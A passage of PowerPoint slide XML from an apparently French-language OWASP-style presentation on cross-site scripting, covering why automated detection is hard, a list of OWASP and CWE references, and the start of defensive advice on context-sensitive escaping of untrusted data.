              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>méthode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de construction des pages et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>différents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpréteurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navigateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avaScript, ActiveX, Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Silverlight, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qui rend la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>délicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>couverture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complète</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ainsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> revue de code et des tests de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pénétration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en plus de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’outil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les technologies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eb 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AJAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rendent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>failles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>difficiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détecter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> via les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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7"/>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8"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"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4"/>
              </a:rPr>
              <a:t>OWASP Cross-Site Scripting Article</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </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1"/>
              </a:rPr>
              <a:t>ESAPI Encoder API</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2"/>
              </a:rPr>
              <a:t>ASVS: Output Encoding/Escaping Requirements (V6)</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3"/>
              </a:rPr>
              <a:t>OWASP AntiSamy: Sanitization Library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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4"/>
              </a:rPr>
              <a:t>Testing Guide: 1st 3 Chapters on Data Validation Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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5"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on XSS Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE Entry 79 on Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s’en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prémunir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La protection contre XSS requiert une gestion des données non fiables séparée du contenu du navigateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilégier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’échapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>donnée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fiable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contexte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lequel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insérée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (corps, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, CSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
